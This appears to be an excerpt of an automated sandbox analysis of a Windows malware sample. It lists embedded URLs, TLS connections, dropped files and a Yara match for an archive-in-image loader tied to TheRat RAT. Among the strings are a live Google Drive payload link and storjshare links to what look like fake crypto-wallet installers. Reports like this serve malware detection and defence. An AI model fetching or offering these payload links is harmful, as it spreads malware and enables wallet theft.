Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: file.exe, 00000000.00000002.2302541318.000001E42763D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.co
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183207852.0000020705476000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.g
Source: file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.gH
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
Source: file.exeString found in binary or memory: https://drive.google.com/uc?id=
Source: file.exe, 00000002.00000003.2285253534.00000207054C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download:
Source: file.exe, 00000000.00000002.2302541318.000001E427628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadYaZ29A4JaDrWxIN2le.c
Source: file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloades
Source: file.exe, 00000000.00000003.2261006797.000001E427686000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E42767F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloads
Source: file.exe, 00000000.00000003.2261006797.000001E427656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadt
Source: file.exeString found in binary or memory: https://drive.google.com/uc?id=URL:
Source: file.exe, 00000002.00000003.2285357807.0000020705523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
Source: file.exe, 00000002.00000002.2326412111.0000020705523000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285357807.0000020705523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/I
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260925103.000001E4276A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261006797.000001E42769C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E42769A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261120169.000001E4276AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302798915.000001E429270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285157291.000002070551A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285157291.00000207054F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.00000207054DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285357807.00000207054FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000000.00000002.2302798915.000001E429270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadL
Source: file.exe, 00000002.00000003.2285157291.00000207054F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285357807.00000207054FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadN
Source: file.exe, 00000000.00000002.2302541318.000001E427663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.2302541318.000001E4275F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: file.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/c
Source: file.exeString found in binary or memory: https://ipinfo.io/json
Source: file.exeString found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonUU
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json_U
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsongU
Source: file.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonhz
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonoU
Source: json[1].json.2.dr, json[1].json.0.drString found in binary or memory: https://ipinfo.io/missingauth
Source: file.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/o
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183385984.00000207054B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183348068.00000207054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js16FBB22_ty
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js77ED382
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsF
Source: file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsF6B34A4rmi
Source: file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183385984.00000207054B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183348068.00000207054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js4EEE6F7Frro
Source: file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js56D1DC42est
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsCCDD9E26
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js~
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: file.exe, 00000002.00000003.2183099205.00000207054B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/=B~
Source: file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/D
Source: file.exe, 00000002.00000003.2183099205.00000207054B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/_C
Source: file.exe, 00000000.00000003.2172989536.000001E427674000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175064933.000001E427676000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174902630.000001E427674000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172803550.000001E42765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/hjai
Source: file.exe, 00000000.00000003.2174782172.000001E42764A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/om/
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2182984321.0000020705493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly0C8FF72CtsE
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCCDD9E26
Source: file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyE7ECA491j
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyE7ECA491rro
Source: file.exe, 00000000.00000003.2173656848.000001E42763B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore7
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore8
Source: file.exe, 00000000.00000003.2174782172.000001E42764C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreF
Source: file.exe, 00000000.00000003.2173656848.000001E42763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore_
Source: file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra6
Source: file.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraC&b
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox2CppkN
Source: file.exe, 00000000.00000003.2174782172.000001E42764C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxJ
Source: file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxK
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C4D200_2_00007FF72C9C4D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B5D600_2_00007FF72C9B5D60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C5EC00_2_00007FF72C9C5EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C10F00_2_00007FF72C9C10F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B69700_2_00007FF72C9B6970
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B9B000_2_00007FF72C9B9B00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9BCA900_2_00007FF72C9BCA90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C3CE00_2_00007FF72C9C3CE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B7C500_2_00007FF72C9B7C50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9BB6000_2_00007FF72C9BB600
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9BE7900_2_00007FF72C9BE790
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B61900_2_00007FF72C9B6190
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0E1700_2_00007FF72CA0E170
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0D2C80_2_00007FF72CA0D2C8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C83F00_2_00007FF72C9C83F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9EE4400_2_00007FF72C9EE440
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0FDA00_2_00007FF72CA0FDA0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA03D400_2_00007FF72CA03D40
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0ED1C0_2_00007FF72CA0ED1C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C2EF00_2_00007FF72C9C2EF0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FF0040_2_00007FF72C9FF004
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B10000_2_00007FF72C9B1000
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9D80100_2_00007FF72C9D8010
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E1F300_2_00007FF72C9E1F30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA00F300_2_00007FF72CA00F30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA020400_2_00007FF72CA02040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B90300_2_00007FF72C9B9030
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0DAD40_2_00007FF72CA0DAD4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FEAF80_2_00007FF72C9FEAF8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B1A200_2_00007FF72C9B1A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9DEA200_2_00007FF72C9DEA20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA04C100_2_00007FF72CA04C10
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E6CB00_2_00007FF72C9E6CB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E4D100_2_00007FF72C9E4D10
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FACDC0_2_00007FF72C9FACDC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0ACDC0_2_00007FF72CA0ACDC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0D5440_2_00007FF72CA0D544
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E86C00_2_00007FF72C9E86C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FA6980_2_00007FF72C9FA698
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA1070C0_2_00007FF72CA1070C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0A65C0_2_00007FF72CA0A65C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9D97C00_2_00007FF72C9D97C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B17A00_2_00007FF72C9B17A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E57200_2_00007FF72C9E5720
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA137740_2_00007FF72CA13774
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA018B80_2_00007FF72CA018B8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9BD8A60_2_00007FF72C9BD8A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9DF9100_2_00007FF72C9DF910
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B98300_2_00007FF72C9B9830
